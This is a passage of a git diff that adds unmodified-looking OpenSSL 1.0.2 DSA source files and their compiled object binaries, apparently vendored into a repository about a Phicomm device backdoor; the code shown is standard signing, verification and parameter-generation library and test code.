+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/dsa.h>
+
+#ifndef OPENSSL_NO_FP_API
+int DSA_print_fp(FILE *fp, const DSA *x, int off)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        DSAerr(DSA_F_DSA_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = DSA_print(b, x, off);
+    BIO_free(b);
+    return (ret);
+}
+
+int DSAparams_print_fp(FILE *fp, const DSA *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        DSAerr(DSA_F_DSAPARAMS_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = DSAparams_print(b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int DSA_print(BIO *bp, const DSA *x, int off)
+{
+    EVP_PKEY *pk;
+    int ret;
+    pk = EVP_PKEY_new();
+    if (!pk || !EVP_PKEY_set1_DSA(pk, (DSA *)x))
+        return 0;
+    ret = EVP_PKEY_print_private(bp, pk, off, NULL);
+    EVP_PKEY_free(pk);
+    return ret;
+}
+
+int DSAparams_print(BIO *bp, const DSA *x)
+{
+    EVP_PKEY *pk;
+    int ret;
+    pk = EVP_PKEY_new();
+    if (!pk || !EVP_PKEY_set1_DSA(pk, (DSA *)x))
+        return 0;
+    ret = EVP_PKEY_print_params(bp, pk, 4, NULL);
+    EVP_PKEY_free(pk);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..50eab7be2b861b507e93ff144073ccbc7f671b28
GIT binary patch
literal 3120
zcmbuBO^g&p6o6}fkWrUr#Gj18kUkKy1Zk&N5|x9Q9;Rn|WpvkJhbVDvdv|+fb$4dc
z)1!b!jL2$-MU8h(CdPw_UcBr9CIN$7H6$KMG>W1k5o2Ode6PCRPHj)O2Ytz#diC{t
z_3BksSI<$iR!yf;j3mV#W&Ive#(vH9?GiUjYy%r&zir&|r_nHii^k+waHC-z`zdb)
z{?^=O^s!EWWgYKzvwH8!16FX}3O?r#j`#eZ^$V5YM=SWH7JMH%2UmlN2s{CXb?jVz
z%6P_@I?HqH9}E6oO?18Sq=-2mwvc0ssrU2?E9)We>3R4$a~u4a`nTNSiUz4`!8QHM
z(=Xt}f-tTYd}jq$VIDLCBRI#+1C`(sPi{OLrl;x(3DxNX)vaWCqJOKe04c)Z8)Ly=
zxPsRkVkYr*xdV0W;C1~FTUWFws_85n-Lq%6I^3A<HvO*pi1wgX+^Ij*<z4-?k)l@I
zwLQcPi^zkn108*$!P1QNkYzwo?g|^0I#Oq;L;2L^q4l}<-~inZ{66t)7Tc<lKbba_
z!g8jfs7u+3QcUkvR6{A0m3&#r?E;sY@INa2-$DPA8B<Z0!GCyZodH3%G7JNhDQ+wH
zzA55t5x1PKD1{}+Q%pau6bwE-&gWy{*Aag5d|+HL6XBH5;JcA!*KWo=&cwbsxK^}U
zYojuJb=NZNW!No)kaIlTgOXvnK?o$ncWv#X+o8KjnkU~IV0VM!K1XE-fH?ke0)H%l
zI|;l69Opyx;Cm13)dc^y68O6b{8R$}FoAyp9Ov^5v?%;cL3;)?ZXGTHNB^?8H2K*A
z#%4Q?-S(Q=46E!jz?yIR%pR?cmyMb|UajskC+$h2Tr+KE?w_zH_L@)IP50$~r{ns%
z4WWI)$H0+Za(uUs=RDW#=dkD6tUNYuckH?O1(%zA*m~V=cYWLSyq3r5jPEUQgW}tc
z=PY)_OjqY5lJaMmMfSp6_hPLeSx`J%H*SV9f)E7x5Ge5~LJ;H|K#A88f*@Bwi621-
zf*jYM_!|g8klz7H`~!p_$Txu!UqJ|h{7z8fUmyfQek&;PuMmPD$2*Sr9|%E^%k}2P
z{v(&`-6rvS;2DiGB5}Fiy2Ryr4@g|D_Z5lD^}a80x!zL}$9JCQ^O3~mdR6d2fqS1T
z@4(N5Fo@5J{@W2w@6o3bPVWoTI)@j1XBt}H3)_QadG3Ov`R*Z~X|s;+Fm1ZiVcJY<
zanXgBNo%%zSA%cT&W`WQyeRt5H@jNfYqed^Kg={ff_u=OgQJb#&i^ke41r4(y`f9M
zP(Bmu81_P6va#I^if5z*DoaTWcuB<LpBFUgW-kcmZGuO?D8EPY3U@vR+1TQD5Xbzl
z@jAp}sv@W?lpntrve2}s-3<@Pmi<&bNHG%i#qSG#1*7g1uSUk8^&>nD296nxFA4B9
zIf^zKKLtE)|5V}loQT8yLqzeke{s1nq#!ng=7Dz$-bc}RWYN6?#Gb-GXdsuvX7x9^
Tet37p#lJ2REv!a{Ml}8(<X;Db

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.c
new file mode 100644
index 0000000..c2b71d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.c
@@ -0,0 +1,110 @@
+/* crypto/dsa/dsa_sign.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* Original version from Steven Schoch <schoch@sheba.arc.nasa.gov> */
+
+#include "cryptlib.h"
+#include <openssl/dsa.h>
+#include <openssl/rand.h>
+#include <openssl/bn.h>
+
+DSA_SIG *DSA_do_sign(const unsigned char *dgst, int dlen, DSA *dsa)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(dsa->meth->flags & DSA_FLAG_FIPS_METHOD)
+        && !(dsa->flags & DSA_FLAG_NON_FIPS_ALLOW)) {
+        DSAerr(DSA_F_DSA_DO_SIGN, DSA_R_NON_FIPS_DSA_METHOD);
+        return NULL;
+    }
+#endif
+    return dsa->meth->dsa_do_sign(dgst, dlen, dsa);
+}
+
+int DSA_sign_setup(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp, BIGNUM **rp)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(dsa->meth->flags & DSA_FLAG_FIPS_METHOD)
+        && !(dsa->flags & DSA_FLAG_NON_FIPS_ALLOW)) {
+        DSAerr(DSA_F_DSA_SIGN_SETUP, DSA_R_NON_FIPS_DSA_METHOD);
+        return 0;
+    }
+#endif
+    return dsa->meth->dsa_sign_setup(dsa, ctx_in, kinvp, rp);
+}
+
+DSA_SIG *DSA_SIG_new(void)
+{
+    DSA_SIG *sig;
+    sig = OPENSSL_malloc(sizeof(DSA_SIG));
+    if (!sig)
+        return NULL;
+    sig->r = NULL;
+    sig->s = NULL;
+    return sig;
+}
+
+void DSA_SIG_free(DSA_SIG *sig)
+{
+    if (sig) {
+        if (sig->r)
+            BN_free(sig->r);
+        if (sig->s)
+            BN_free(sig->s);
+        OPENSSL_free(sig);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_sign.o
new file mode 100644
index 0000000000000000000000000000000000000000..d7d89790fc39ec693e3139f6d1005338f3815c7a
GIT binary patch
literal 2216
zcmbtUTTc@~6h5UOHDam67!%a=$<$~kEn>VpXlW^3OasW}0V7$qWd%Yn*luIdpidYH
zG4W^k7xYCEjQHr!&?hv$8BINBc1~G_#Romf&iT$a=bM?GGc(V#`H_x50N4U>8}=h+
z0b*VII3-~U!f+CP^j`RBY^9s6`H%~92qOgVy_>_l_YrK2SJz1Lg&JdH+vzoS34*bk
z3X#9RBefeXCpKej{x-Jm7>K*v{H^tnC)(Vb`%03Xg}P<dmlrFd2$0KUZbf4=g+|3`
zL~n|#A`wqsZ^$tDY#<>LgO^+ypcA#UB>J7)*bH<4Y!es6kL<MTAn;@o0?kOEzo$F&
z8aISA=TzSb<%vsZ9O;J@mn5GJM^?fisePdM0rGdlkry3>kJ$BBqgr&r_m*E$(6>_b
zFZ?$LRYCdp2RVv@ayR_=?!%<a_g{1njvvbJk&Nf?crt=;%oDlr6uLgofAL<QS3Jk;
zuPFYED+jsfh;QIW_0eq%2|u1{L-Xd8K-LKH@)7xuj^M#_E=4|*fZ?ejbD=7as>F0=
z&ARP0R%JLfnlmf*V=#01@$^vM93L5(%1)cpL+O0hgv{jZ#PqmXwo0XHv7P_0X4{Y+
zGo@E4662a;_>tkcmeu&xaxE@d_x$%FW}faS8QlTed*)Y&MALc4r6u2onDe8Gr+MjP
z8&rUKuA8CpT)%mZ=X!vsuazCEfZnOOeu+`dE?L5{n+}Kt%dtQd>U9vcDg~6D6iE=p
zYPoDzFr`v;Y=KulUU#hGii#I24Y69QuG%$c4W%@oy@VTVm2I`4|8!B*(_Pk2d<r?T
zHP^LU{SEHN9;!vEo#BGd>Z&&tPy0(+zM*Foe^K%J%kWn9>rS7a?ir2wuX?(dG$!9G
zgwl9^J{QdM{OnWML73lL&ikOiWhRto9s5z_8GBRrynzSnxwF_uuc7yBQ~Eb*(4w;4
zZ+QQiq4$Eu)b$ZH5!a9Nb$tmt{OWHIi8e1=0NO`-g;~$__nVs}FV*~?l&ANa#?bXN
gre1rbU_z1W6nIPx*JkK#@zcLi>wntLbb+q_0|~R$aR2}S

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.c
new file mode 100644
index 0000000..7dbd0ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.c
@@ -0,0 +1,75 @@
+/* crypto/dsa/dsa_vrf.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* Original version from Steven Schoch <schoch@sheba.arc.nasa.gov> */
+
+#include "cryptlib.h"
+#include <openssl/dsa.h>
+
+int DSA_do_verify(const unsigned char *dgst, int dgst_len, DSA_SIG *sig,
+                  DSA *dsa)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(dsa->meth->flags & DSA_FLAG_FIPS_METHOD)
+        && !(dsa->flags & DSA_FLAG_NON_FIPS_ALLOW)) {
+        DSAerr(DSA_F_DSA_DO_VERIFY, DSA_R_NON_FIPS_DSA_METHOD);
+        return -1;
+    }
+#endif
+    return dsa->meth->dsa_do_verify(dgst, dgst_len, sig, dsa);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_vrf.o
new file mode 100644
index 0000000000000000000000000000000000000000..d469452d87efd54ceae8907230638020bbd4dd46
GIT binary patch
literal 1368
zcmbVKJ5K^Z5T5f?R7`xtLW40_sZlrJBSs4Y@qvlPLSsT>@PGr1^2psnz(Rk3jio=u
z($b&c&(PS};0(8WEGt?t$=o;d-F&+<yZdl(a@c1WAkBbXXlIfINcOekSSyUdC<Nha
zZ0`H$F<x(8O+#XDZzsHXk*=0_HN4H%S!6Z3Rc)ow`?Uy*Y%F;+>if~h(Ff2Irx$?B
zzY=GnlTCR5#@!hh^>HIK8W?)Q#)zL4|AGSl1Dd5DKAYWY%&wDC56ZBL(Db`gNDR%^
z6rCJpCJg>2TYTUTo=%|CXvRsUPk-jDYo%&Vj%8r~Jf6yyQ#ISU&NZYuECQOOV;bf*
zirh*AbGhSTK}OuJb6{DETfow;3oKJE7VQ#pr82h}Uel_}t;~(c^Q9`QIOU4%@CGo)
zzO|TLNaY->Xv;2o#}G>C?(`Fki6#AW5V`(l=aDB)z9&%z$1>1R*Dv7zA@pALE2yP4
zBj~Eh{g+h|W4XV?O@&iSYigpzQYWbc4Cs}0+&$)XQ4kg=fo4_h5))ce*FTFQeJ)*}
z#5#J-F;Oq!T{Jo^h+#zPQ|cw(ZEupi(Fg6r0~kT1HFQ03`rVP_MeILAiDH8GnF)-#
O=|4na-mmlmUH=0cNl&i;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsagen.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsagen.c
new file mode 100644
index 0000000..e7d346b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsagen.c
@@ -0,0 +1,115 @@
+/* crypto/dsa/dsagen.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/dsa.h>
+
+#define TEST
+#define GENUINE_DSA
+
+#ifdef GENUINE_DSA
+# define LAST_VALUE 0xbd
+#else
+# define LAST_VALUE 0xd3
+#endif
+
+#ifdef TEST
+unsigned char seed[20] = {
+    0xd5, 0x01, 0x4e, 0x4b,
+    0x60, 0xef, 0x2b, 0xa8,
+    0xb6, 0x21, 0x1b, 0x40,
+    0x62, 0xba, 0x32, 0x24,
+    0xe0, 0x42, 0x7d, LAST_VALUE
+};
+#endif
+
+int cb(int p, int n)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    printf("%c", c);
+    fflush(stdout);
+}
+
+main()
+{
+    int i;
+    BIGNUM *n;
+    BN_CTX *ctx;
+    unsigned char seed_buf[20];
+    DSA *dsa;
+    int counter, h;
+    BIO *bio_err = NULL;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    memcpy(seed_buf, seed, 20);
+    dsa = DSA_generate_parameters(1024, seed, 20, &counter, &h, cb, bio_err);
+
+    if (dsa == NULL)
+        DSA_print(bio_err, dsa, 0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsatest.c
new file mode 100644
index 0000000..8a224a8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsatest.c
@@ -0,0 +1,268 @@
+/* crypto/dsa/dsatest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+#include "../e_os.h"
+
+#include <openssl/crypto.h>
+#include <openssl/rand.h>
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/bn.h>
+
+#ifdef OPENSSL_NO_DSA
+int main(int argc, char *argv[])
+{
+    printf("No DSA support\n");
+    return (0);
+}
+#else
+# include <openssl/dsa.h>
+
+# ifdef OPENSSL_SYS_WIN16
+#  define MS_CALLBACK     _far _loadds
+# else
+#  define MS_CALLBACK
+# endif
+
+static int MS_CALLBACK dsa_cb(int p, int n, BN_GENCB *arg);
+
+/*
+ * seed, out_p, out_q, out_g are taken from the updated Appendix 5 to FIPS
+ * PUB 186 and also appear in Appendix 5 to FIPS PIB 186-1
+ */
+static unsigned char seed[20] = {
+    0xd5, 0x01, 0x4e, 0x4b, 0x60, 0xef, 0x2b, 0xa8, 0xb6, 0x21, 0x1b, 0x40,
+    0x62, 0xba, 0x32, 0x24, 0xe0, 0x42, 0x7d, 0xd3,
+};
+
+static unsigned char out_p[] = {
+    0x8d, 0xf2, 0xa4, 0x94, 0x49, 0x22, 0x76, 0xaa,
+    0x3d, 0x25, 0x75, 0x9b, 0xb0, 0x68, 0x69, 0xcb,
+    0xea, 0xc0, 0xd8, 0x3a, 0xfb, 0x8d, 0x0c, 0xf7,
+    0xcb, 0xb8, 0x32, 0x4f, 0x0d, 0x78, 0x82, 0xe5,
+    0xd0, 0x76, 0x2f, 0xc5, 0xb7, 0x21, 0x0e, 0xaf,
+    0xc2, 0xe9, 0xad, 0xac, 0x32, 0xab, 0x7a, 0xac,
+    0x49, 0x69, 0x3d, 0xfb, 0xf8, 0x37, 0x24, 0xc2,
+    0xec, 0x07, 0x36, 0xee, 0x31, 0xc8, 0x02, 0x91,
+};
+
+static unsigned char out_q[] = {
+    0xc7, 0x73, 0x21, 0x8c, 0x73, 0x7e, 0xc8, 0xee,
+    0x99, 0x3b, 0x4f, 0x2d, 0xed, 0x30, 0xf4, 0x8e,
+    0xda, 0xce, 0x91, 0x5f,
+};
+
+static unsigned char out_g[] = {
+    0x62, 0x6d, 0x02, 0x78, 0x39, 0xea, 0x0a, 0x13,
+    0x41, 0x31, 0x63, 0xa5, 0x5b, 0x4c, 0xb5, 0x00,
+    0x29, 0x9d, 0x55, 0x22, 0x95, 0x6c, 0xef, 0xcb,
+    0x3b, 0xff, 0x10, 0xf3, 0x99, 0xce, 0x2c, 0x2e,
+    0x71, 0xcb, 0x9d, 0xe5, 0xfa, 0x24, 0xba, 0xbf,
+    0x58, 0xe5, 0xb7, 0x95, 0x21, 0x92, 0x5c, 0x9c,
+    0xc4, 0x2e, 0x9f, 0x6f, 0x46, 0x4b, 0x08, 0x8c,
+    0xc5, 0x72, 0xaf, 0x53, 0xe6, 0xd7, 0x88, 0x02,
+};
+
+static const unsigned char str1[] = "12345678901234567890";
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+static BIO *bio_err = NULL;
+
+int main(int argc, char **argv)
+{
+    BN_GENCB cb;
+    DSA *dsa = NULL;
+    int counter, ret = 0, i, j;
+    unsigned char buf[256];
+    unsigned long h;
+    unsigned char sig[256];
+    unsigned int siglen;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    CRYPTO_malloc_debug_init();
+    CRYPTO_dbg_set_options(V_CRYPTO_MDEBUG_ALL);
